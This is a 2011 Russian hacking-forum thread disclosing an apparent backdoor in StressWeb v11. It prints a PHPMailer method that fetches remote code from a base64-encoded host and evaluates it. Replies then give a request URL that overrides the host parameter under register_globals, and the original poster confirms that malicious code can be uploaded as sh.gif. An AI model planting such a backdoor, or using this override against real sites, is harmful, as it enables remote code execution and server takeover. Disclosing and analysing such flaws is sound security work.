Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   Уязвимость всех stressweb v11(нули и лицензии) (https://forum.antichat.xyz/showthread.php?t=297102)

ItsIsMyLife 06.10.2011 18:42

Итак, 2ая за сегодня найденная уязвимость в стресс вебе(stress web) v11. Данной уязвимости подвержены абсолютно все сайты, nulled и не nulled версий. Абсолютно любой сервер стоящий на stress web может быть взломан самим разработчиком

Мы все понимаем, что разработчик тоже должен кушать и стремиться к защите своих авторских прав, но подобное не допустимо в коде столь популярного продукта.

Вся беда в том, что данной уязвимости может быть подвержен даже лицензионный сайт и не важно платили вы или нет - ваша безопасность ровно на 1 уровне.

Ну теперь перейдем к самой уязвимости. Зашита она разработчиком, в классе PHPMailer, /inc/classes/class.phpmailer.php. Рассмотрим ее:

Код:

Code:
private function shBody(){return file_get_contents($this->EncodeString($this->shHostname, 'base64dec'). 'sh.gif');}

Значение shHostname - aHR0cDovL25ldy5zdHJlc3N3ZWIucnUv, после base64_encode принимает значение: http://new.stressweb.ru/

Вызывается эта функция вот так: PHPMailer::startSh()[псевдолинки shIsAuth()->shEval()->shBody()].

В результате, если владелец stressweb по адресу new.stressweb.ru/sh.gif разместит вредоностный код, он сможет быть исполнен АБСОЛЮТНО НА ЛЮБОМ сайте с веб-обвязкой stressweb, абсолютно похеру, есть там лицензия или ее нет.

А теперь реальный пример - захотел наш "stressweb" убить 1 фришку, заложил вредоностный код на своем сайте в sh.gif и пошел вайпить чей то сервер, умные ребятки в это время заметили этот код и пошли вайпить то, что они захотят ... или получать доступ к базам/конфигам и прочему. Вот вам яркий пример халатности разработчика.

Excellent18 06.10.2011 19:24

умельцы, рассказывайте, как ее заюзать нам)

Kuteke 06.10.2011 19:42

Требование:

register_globals = on

http://site.ru/index.php?f=stat&shHostname=тут закодированный URL в base64

Как я понял... Правильно?

ItsIsMyLife 06.10.2011 20:40

Да, заливаете sh.gif внутри код вредоносный

Excellent18 06.10.2011 22:13

какого рода должен быть код?

лучше на примере

и юзать точно так?

http://site.ru/index.php?f=stat&shHostname=тут закодированный URL в base64

почему именно f=stat?


Время: 15:42